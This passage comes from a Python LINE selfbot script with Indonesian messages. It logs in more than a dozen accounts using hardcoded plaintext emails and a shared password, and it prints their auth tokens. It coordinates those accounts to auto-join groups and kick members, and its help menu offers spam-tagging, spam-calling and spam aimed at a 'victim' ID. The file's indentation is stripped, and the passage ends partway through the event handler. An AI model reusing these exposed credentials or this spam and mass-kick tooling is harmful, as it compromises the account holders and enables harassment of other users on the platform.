responsename5 = km.getProfile().displayName
kb = LineClient("bardians45@gmail.com","sbardian71993")
kb.log("Auth Token : " + str(kb.authToken))
channel5 = LineChannel(kb)
kb.log("Channel Access Token : " + str(channel5.channelAccessToken))
lineProfile = kb.getProfile()
lineSettings = kb.getSettings()
Emid = kb.getProfile().mid
responsename6 = kb.getProfile().displayName
kn = LineClient("bardiansyah101@gmail.com","sbardian71993")
kn.log("Auth Token : " + str(kn.authToken))
channel6 = LineChannel(kn)
kn.log("Channel Access Token : " + str(channel6.channelAccessToken))
lineProfile = kn.getProfile()
lineSettings = kn.getSettings()
Fmid = kn.getProfile().mid
responsename7 = kn.getProfile().displayName
ko = LineClient("bardiansyah103@gmail.com","sbardian71993")
ko.log("Auth Token : " + str(ko.authToken))
channel7 = LineChannel(ko)
ko.log("Channel Access Token : " + str(channel7.channelAccessToken))
lineProfile = ko.getProfile()
lineSettings = ko.getSettings()
Gmid = ko.getProfile().mid
responsename8 = ko.getProfile().displayName
kw = LineClient("bardiansyah104@gmail.com","sbardian71993")
kw.log("Auth Token : " + str(kw.authToken))
channel8 = LineChannel(kw)
kw.log("Channel Access Token : " + str(channel8.channelAccessToken))
lineProfile = kw.getProfile()
lineSettings = kw.getSettings()
Hmid = kw.getProfile().mid
responsename9 = kw.getProfile().displayName
ke = LineClient("bardiansyah106@gmail.com","sbardian71993")
ke.log("Auth Token : " + str(ke.authToken))
channel9 = LineChannel(ke)
ke.log("Channel Access Token : " + str(channel9.channelAccessToken))
lineProfile = ke.getProfile()
lineSettings = ke.getSettings()
Imid = ke.getProfile().mid
responsename10 = ke.getProfile().displayName
ky = LineClient("bardiansyah107@gmail.com","sbardian71993")
ky.log("Auth Token : " + str(ky.authToken))
channel10 = LineChannel(ky)
ky.log("Channel Access Token : " + str(channel10.channelAccessToken))
lineProfile = ky.getProfile()
lineSettings = ky.getSettings()
Jmid = ky.getProfile().mid
responsename11 = ky.getProfile().displayName
sw = LineClient("tiarazeta94@gmail.com","sbardian71993")
sw.log("Auth Token : " + str(sw.authToken))
channel11 = LineChannel(sw)
sw.log("Channel Access Token : " + str(channel11.channelAccessToken))
lineProfile = sw.getProfile()
lineSettings = sw.getSettings()
Zmid = sw.getProfile().mid
responsename12 = sw.getProfile().displayName
sx = LineClient("famzbot1@gmail.com","sbardian71993")
sx.log("Auth Token : " + str(sx.authToken))
channel12 = LineChannel(sx)
sx.log("Channel Access Token : " + str(channel12.channelAccessToken))
lineProfile = sx.getProfile()
lineSettings = sx.getSettings()
Xmid = sx.getProfile().mid
responsename13 = sx.getProfile().displayName
js = LineClient("famzbot2@gmail.com","sbardian71993")
js.log("Auth Token : " + str(js.authToken))
channel13 = LineChannel(js)
js.log("Channel Access Token : " + str(channel13.channelAccessToken))
lineProfile = js.getProfile()
lineSettings = js.getSettings()
JSmid = js.getProfile().mid
responsename14 = js.getProfile().displayName
print("---LOGIN SUCCES---")
poll = LinePoll(cl)
call = cl
creator = ["u207280ad8ec168e15de1da1246675fd3"]
owner = ["u207280ad8ec168e15de1da1246675fd3"]
admin = ["u207280ad8ec168e15de1da1246675fd3"]
staff = ["u207280ad8ec168e15de1da1246675fd3","ub57eb6366ece293609d3130c80d9838b","u971f78f9fd335ebff75a2f7571b2b3bd","u780dd8a697d1b2c1560e6191d4e6148b","u206e7fe39b8e16080e6982c58f6fe3d2","u5b46014cf8ec3a90236bd209e3dd0de4","ud3907dfe944b2adbcc1c6d4421582ea4","ud88f140c110366a807dfbc9184f14c42"]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = km.getProfile().mid
Emid = kb.getProfile().mid
Fmid = kn.getProfile().mid
Gmid = ko.getProfile().mid
Hmid = kw.getProfile().mid
Imid = ke.getProfile().mid
Jmid = ky.getProfile().mid
Zmid = sw.getProfile().mid
Xmid = sx.getProfile().mid
JSmid = js.getProfile().mid
KAC = [cl,ki,kk,kc,km,kb,kn,ko,kw,ke,ky]
ABC = [ki,kk,kc,km,kb,kn,ko,kw,ke,ky]
Bots = [mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,Zmid,Xmid,JSmid]
Dpk = admin + staff
protectqr = []
protectkick = []
protectjoin = []
protectinvite = []
protectcancel = []
protectantijs = []
ghost = []
welcome = []
responsename1 = ki.getProfile().displayName
responsename2 = kk.getProfile().displayName
responsename3 = kc.getProfile().displayName
responsename4 = km.getProfile().displayName
responsename5 = kb.getProfile().displayName
responsename6 = kn.getProfile().displayName
responsename7 = ko.getProfile().displayName
responsename8 = kw.getProfile().displayName
responsename9 = ke.getProfile().displayName
responsename10 = ky.getProfile().displayName
settings = {
"Picture":False,
"group":{},
"groupPicture":False,
"changePicture":False,
"autoJoinTicket":True,
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"
]
}
wait = {
"limit": 5,
"owner":{},
"admin":{},
"addadmin":False,
"delladmin":False,
"staff":{},
"addstaff":False,
"dellstaff":False,
"bots":{},
"addbots":False,
"dellbots":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Talkblacklist":{},
"Talkwblacklist":False,
"Talkdblacklist":False,
"talkban":True,
"contact":False,
'autoJoin':True,
'autoAdd':True,
'autoRead':False,
'autoLeave':False,
'autoLeave1':False,
"detectMention":True,
"Mentionkick":False,
"welcomeOn":False,
"sticker":False,
"selfbot":True,
"protectantijsOn":True,
"ghostOn":True,
"mention":"Lagi Stalking yaaa...! gabung sini ð",
"Respontag":"Apaan tag2 kalo penting VC aja langsung",
"welcome":"Selamat datang & semoga betah",
"comment":"Like like & like ",
"message":"Terimakasih sudah add saya\n Butuh Selfbot only\n Butuh Selbot dengan asist\n Protect Room/Ivent\n Jaga room/Event\n Songbook smule\n follower smule\n V.I.P Smule\n stiker Line\n Langsung saya Tanya sama bosku yaa\n id Line udo1993 atau castello_bardian\n Thanks yaaa..!\n FI FAMZ BOTZ",
}
read = {
"readPoint":{},
"readMember":{},
"readTime":{},
"ROM":{},
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
with open('creator.json', 'r') as fp:
creator = json.load(fp)
with open('owner.json', 'r') as fp:
owner = json.load(fp)
Setbot = codecs.open("setting.json","r","utf-8")
Setmain = json.load(Setbot)
mulai = time.time()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def restartBot():
python = sys.executable
os.execl(python, python, *sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
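# Minimal usage sketch (the value is illustrative only):
#   runtime(90061)  # -> '01 Hari 01 Jam 01 Menit 01 Detik'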
def mentionMembers(to, mid):
try:
arrData = ""
textx = "DAFTAR JONESã{}ã\n\n [ Silahkan pilih ]\n1. ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\nâââ[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\nâââ[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def siderMembers(to, mid):
try:
arrData = ""
textx = "Hallo ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["mention"]
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\nâââ[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\nâââ[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def welcomeMembers(to, mid):
try:
arrData = ""
textx = "Hallo ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["welcome"]+"\nNama grup : "+str(ginfo.name)
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\nâââ[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\nâââ[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention(to, mid, firstmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x \n"
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,3,1)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = cl.getAllContactIds()
gid = cl.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
eltime = time.time() - mulai
bot = runtime(eltime)
text += mention+"â Jam : "+datetime.strftime(timeNow,'%H:%M:%S')+" Wib\nâ© Group : "+str(len(gid))+"\nâ© Teman : "+str(len(teman))+"\nâ© Expired : In "+hari+"\nâ© Version : ANTIJS2\nâ© Tanggal : "+datetime.strftime(timeNow,'%Y-%m-%d')+"\nâ© Runtime : \n ⢠"+bot
cl.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def command(text):
pesan = text.lower()
if pesan.startswith(Setmain["keyCommand"]):
cmd = pesan.replace(Setmain["keyCommand"],"")
else:
cmd = "command"
return cmd
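# Minimal sketch (the key value is an assumption): with Setmain["keyCommand"]
# set to "!", command("!speed") returns "speed"; text without the key prefix
# falls through to the literal string "command".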
def help():
key = Setmain["keyCommand"]
key = key.title()
helpMessage = "â¬â¬â¬â¬à®Û©ÛÛ©à®â¬â¬â¬â¬\n" + \
"âââ[ Menu hari ini ]\n"+\
"ââ¯â¸ " + key + "Me\n" + \
"ââ¯â¸ " + key + "Midã@ã\n" + \
"ââ¯â¸ " + key + "Infoã@ã\n" + \
"ââ¯â¸ " + key + "Nkã@ã\n" + \
"ââ¯â¸ " + key + "Kick1ã@ã\n" + \
"ââ¯â¸ " + key + "Mybot\n" + \
"ââ¯â¸ " + key + "Status\n" + \
"ââ¯â¸ " + key + "About\n" + \
"ââ¯â¸ " + key + "Restart\n" + \
"ââ¯â¸ " + key + "Runtime\n" + \
"ââ¯â¸ " + key + "Creator\n" + \
"ââ¯â¸ " + key + "Speed/Sp\n" + \
"ââ¯â¸ " + key + "Respontime\n" + \
"ââ¯â¸ " + key + "Sepinya\n" + \
"ââ¯â¸ " + key + "Joinall\n" + \
"ââ¯â¸ " + key + "Byeall\n" + \
"ââ¯â¸ " + key + "Bye me\n" + \
"ââ¯â¸ " + key + "LeaveãNamagrupã\n" + \
"ââ¯â¸ " + key + "Ginfo\n" + \
"ââ¯â¸ " + key + "Open\n" + \
"ââ¯â¸ " + key + "Close\n" + \
"ââ¯â¸ " + key + "Url\n" + \
"ââ¯â¸ " + key + "Gruplist\n" + \
"ââ¯â¸ " + key + "Openãnomerã\n" + \
"ââ¯â¸ " + key + "Closeãnomerã\n" + \
"ââ¯â¸ " + key + "Infogrupãnomerã\n" + \
"ââ¯â¸ " + key + "Infomemãnomerã\n" + \
"ââ¯â¸ " + key + "Leaveallãnomerã\n" + \
"ââ¯â¸ " + key + "Remove chat\n" + \
"ââ¯â¸ " + key + "Lurkingãon/offã\n" + \
"ââ¯â¸ " + key + "Lurkers\n" + \
"ââ¯â¸ " + key + "Siderãon/offã\n" + \
"ââ¯â¸ " + key + "Updatefoto\n" + \
"ââ¯â¸ " + key + "Updategrup\n" + \
"ââ¯â¸ " + key + "Updatebot\n" + \
"ââ¯â¸ " + key + "Broadcast:ãTextã\n" + \
"ââ¯â¸ " + key + "SetkeyãNew Keyã\n" + \
"ââ¯â¸ " + key + "Mykey\n" + \
"ââ¯â¸ " + key + "Resetkey\n" + \
"â ââ[ á´á´á´
ɪᴠ]\n" + \
"ââ¯â¸ " + key + "Kode wilayah\n" + \
"ââ¯â¸ " + key + "Listmp3\n" + \
"ââ¯â¸ " + key + "Listvideo\n" + \
"ââ¯â¸ " + key + "Listimage\n" + \
"ââ¯â¸ " + key + "Liststicker\n" + \
"ââ¯â¸ " + key + "AddimgãTeksã\n" + \
"ââ¯â¸ " + key + "DellimgãTeksã\n" + \
"ââ¯â¸ " + key + "Addmp3ãTeksã\n" + \
"ââ¯â¸ " + key + "Dellmp3ãTeksã\n" + \
"ââ¯â¸ " + key + "AddvideoãTeksã\n" + \
"ââ¯â¸ " + key + "DellvideoãTeksã\n" + \
"ââ¯â¸ " + key + "AddstickerãTeksã\n" + \
"ââ¯â¸ " + key + "DellstickerãTeksã\n" + \
"ââ¯â¸ " + key + "Spamtag:ãjumlahnyaã\n" + \
"ââ¯â¸ " + key + "Spamtagã@ã\n" + \
"ââ¯â¸ " + key + "Spamcall:ãjumlahnyaã\n" + \
"ââ¯â¸ " + key + "Spamcall\n" + \
"ââ¯â¸ " + key + "Ytmp3:ãJudul Laguã\n" + \
"ââ¯â¸ " + key + "Ytmp4:ãJudul Videoã\n" + \
"ââ¯â¸ " + key + "MusikãNama Penyanyiã\n" + \
"ââ¯â¸ " + key + "Get-fsãQueryã\n" + \
"ââ¯â¸ " + key + "Get-lineãID Lineã\n" + \
"ââ¯â¸ " + key + "Get-apkãQueryã\n" + \
"ââ¯â¸ " + key + "Get-gifãQueryã\n" + \
"ââ¯â¸ " + key + "Get-xxxãQueryã\n" + \
"ââ¯â¸ " + key + "Get-animeãQueryã\n" + \
"ââ¯â¸ " + key + "Get-mimpiãQueryã\n" + \
"ââ¯â¸ " + key + "Get-audioãQueryã\n" + \
"ââ¯â¸ " + key + "Get-mp3ãQueryã\n" + \
"ââ¯â¸ " + key + "Get-videoãQueryã\n" + \
"ââ¯â¸ " + key + "Get-bintangãZodiakã\n" + \
"ââ¯â¸ " + key + "Get-zodiakãZodiakã\n" + \
"ââ¯â¸ " + key + "Get-sholatãNama Kotaã\n" + \
"ââ¯â¸ " + key + "Get-cuacaãNama Kotaã\n" + \
"ââ¯â¸ " + key + "Get-lokasiãNama Kotaã\n" + \
"ââ¯â¸ " + key + "Get-lirikãJudul Laguã\n" + \
"ââ¯â¸ " + key + "Get-instagramãUser Nameã\n" + \
"ââ¯â¸ " + key + "Get-dateãtgl-bln-thnã\n" + \
"â ââ[ protect ]\n" + \
"ââ¯â¸ " + key + "Notagãon/offã\n" + \
"ââ¯â¸ " + key + "Allproãon/offã\n" + \
"ââ¯â¸ " + key + "Protecturlãon/offã\n" + \
"ââ¯â¸ " + key + "Protectjoinãon/offã\n" + \
"ââ¯â¸ " + key + "Protectkickãon/offã\n" + \
"ââ¯â¸ " + key + "Protectinviteãon/offã\n" + \
"ââ¯â¸ " + key + "Protectcancelãon/offã\n" + \
"ââ¯â¸ " + key + "Antijsãon/offã\n" + \
"ââ¯â¸ " + key + "Ghostãon/offã\n" + \
"â ââ[ Set kicker ]\n" + \
"ââ¯â¸ " + key + "Kickãon/offã\n" + \
"ââ¯â¸ " + key + "Nkã@ã\n" + \
"ââ¯â¸ " + key + "Kick1ã@ã\n" + \
"â ââ[ Set user ]\n" + \
"ââ¯â¸ " + key + "Inviteãon/offã\n" + \
"ââ¯â¸ " + key + "Stickerãon/offã\n" + \
"ââ¯â¸ " + key + "Unsendãon/offã\n" + \
"ââ¯â¸ " + key + "Respontimeãon/offã\n" + \
"ââ¯â¸ " + key + "Timelineãon/offã\n" + \
"ââ¯â¸ " + key + "Contactãon/offã\n" + \
"ââ¯â¸ " + key + "Autojoinãon/offã\n" + \
"ââ¯â¸ " + key + "Autoaddãon/offã\n" + \
"ââ¯â¸ " + key + "Welcomeãon/offã\n" + \
"ââ¯â¸ " + key + "Autoleaveãon/offã\n" + \
"ââ¯â¸ " + key + "Jointicketãon/offã\n" + \
"â ââ[ Set Admin ]\n" + \
"ââ¯â¸ " + key + "Selfãon/offã\n" + \
"ââ¯â¸ " + key + "Bot:on\n" + \
"ââ¯â¸ " + key + "Bot:expell\n" + \
"ââ¯â¸ " + key + "Staff:on\n" + \
"ââ¯â¸ " + key + "Staff:expell\n" + \
"ââ¯â¸ " + key + "Admin:on\n" + \
"ââ¯â¸ " + key + "Admin:expell\n" + \
"ââ¯â¸ " + key + "Botaddã@ã\n" + \
"ââ¯â¸ " + key + "Botdellã@ã\n" + \
"ââ¯â¸ " + key + "Staffaddã@ã\n" + \
"ââ¯â¸ " + key + "Staffdellã@ã\n" + \
"ââ¯â¸ " + key + "Adminaddã@ã\n" + \
"ââ¯â¸ " + key + "Admindellã@ã\n" + \
"ââ¯â¸ " + key + "Refresh\n" + \
"ââ¯â¸ " + key + "Listbot\n" + \
"ââ¯â¸ " + key + "Listadmin\n" + \
"ââ¯â¸ " + key + "Listprotect\n" + \
"âââ[ Famz_Botz_FI ]\n" + \
"â¬â¬â¬â¬à®Û©ÛÛ©à®â¬â¬â¬â¬\n" + \
"\nKetikã Refresh ãjika makanannya sudah habis...\n"
return helpMessage
def helpbot():
key = Setmain["keyCommand"]
key = key.title()
helpMessage1 = "â¬â¬â¬â¬à®Û©ÛÛ©à®â¬â¬â¬â¬\n" + \
"âââ[ Makan__Malam ]\n"+\
"ââ¯â¸ " + key + "Blc\n" + \
"ââ¯â¸ " + key + "Ban:on\n" + \
"ââ¯â¸ " + key + "Unban:on\n" + \
"ââ¯â¸ " + key + "Banã@ã\n" + \
"ââ¯â¸ " + key + "Unbanã@ã\n" + \
"ââ¯â¸ " + key + "Talkbanã@ã\n" + \
"ââ¯â¸ " + key + "Untalkbanã@ã\n" + \
"ââ¯â¸ " + key + "Talkban:on\n" + \
"ââ¯â¸ " + key + "Untalkban:on\n" + \
"ââ¯â¸ " + key + "Banlist\n" + \
"ââ¯â¸ " + key + "Talkbanlist\n" + \
"ââ¯â¸ " + key + "Clearban\n" + \
"ââ¯â¸ " + key + "Refresh\n" + \
"â ââ[ Cek Seting ]\n" + \
"ââ¯â¸ " + key + "Cek sider\n" + \
"ââ¯â¸ " + key + "Cek spam\n" + \
"ââ¯â¸ " + key + "Cek pesan \n" + \
"ââ¯â¸ " + key + "Cek respon \n" + \
"ââ¯â¸ " + key + "Cek leave\n" + \
"ââ¯â¸ " + key + "Cek welcome\n" + \
"ââ¯â¸ " + key + "Set sider:ãTextã\n" + \
"ââ¯â¸ " + key + "Set spam:ãTextã\n" + \
"ââ¯â¸ " + key + "Set pesan:ãTextã\n" + \
"ââ¯â¸ " + key + "Set respon:ãTextã\n" + \
"ââ¯â¸ " + key + "Set leave:ãTextã\n" + \
"ââ¯â¸ " + key + "Set welcome:ãTextã\n" + \
"ââ¯â¸ " + key + "Myname:ãNamaã\n" + \
"ââ¯â¸ " + key + "Gift:ãMid korbanããJumlahã\n" + \
"ââ¯â¸ " + key + "Spam:ãMid korbanããJumlahã\n" + \
"âââ[ Famz_Botz_FI ]\n" + \
"â¬â¬â¬â¬à®Û©ÛÛ©à®â¬â¬â¬â¬\n" + \
"\nKetikã Refresh ãjika makannya sudah kenyang...\n"
return helpMessage1
def bot(op):
global time
global ast
global groupParam
try:
if op.type == 0:
return
if op.type == 11:
if op.param1 in protectqr:
wait["blacklist"][op.param2] = True
try:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = cl.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
cl.updateGroup(X)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = ki.reissueGroupTicket(op.param1)
sx.acceptGroupInvitationByTicket(op.param1,Ticket)
sx.kickoutFromGroup(op.param1,[op.param2])
sx.leaveGroup(op.param1)
ki.updateGroup(X)
except:
try:
if kk.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.reissueGroupTicket(op.param1)
X = kk.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kk.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
kk.updateGroup(X)
except:
try:
if kc.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.reissueGroupTicket(op.param1)
X = kc.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kc.reissueGroupTicket(op.param1)
sx.acceptGroupInvitationByTicket(op.param1,Ticket)
sx.kickoutFromGroup(op.param1,[op.param2])
sx.leaveGroup(op.param1)
kc.updateGroup(X)
except:
try:
if km.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
km.reissueGroupTicket(op.param1)
X = km.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = km.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
km.updateGroup(X)
except:
try:
if kb.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kb.reissueGroupTicket(op.param1)
X = kb.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kb.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
kb.updateGroup(X)
except:
try:
if kn.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kn.reissueGroupTicket(op.param1)
X = kn.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kn.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
kn.updateGroup(X)
except:
pass
if op.type == 13:
if mid in op.param3:
if wait["autoLeave"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Haii " +str(ginfo.name))
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Haii " + str(ginfo.name))
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ki.leaveGroup(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kk.leaveGroup(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
kk.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kc.leaveGroup(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Dmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
km.acceptGroupInvitation(op.param1)
ginfo = km.getGroup(op.param1)
km.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
km.leaveGroup(op.param1)
else:
km.acceptGroupInvitation(op.param1)
ginfo = km.getGroup(op.param1)
km.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Emid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kb.acceptGroupInvitation(op.param1)
ginfo = kb.getGroup(op.param1)
kb.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kb.leaveGroup(op.param1)
else:
kb.acceptGroupInvitation(op.param1)
ginfo = kb.getGroup(op.param1)
kb.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Fmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kn.acceptGroupInvitation(op.param1)
ginfo = kn.getGroup(op.param1)
kn.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kn.leaveGroup(op.param1)
else:
kn.acceptGroupInvitation(op.param1)
ginfo = kn.getGroup(op.param1)
kn.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Gmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ko.acceptGroupInvitation(op.param1)
ginfo = ko.getGroup(op.param1)
ko.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ko.leaveGroup(op.param1)
else:
ko.acceptGroupInvitation(op.param1)
ginfo = ko.getGroup(op.param1)
ko.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Hmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kw.acceptGroupInvitation(op.param1)
ginfo = kw.getGroup(op.param1)
kw.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
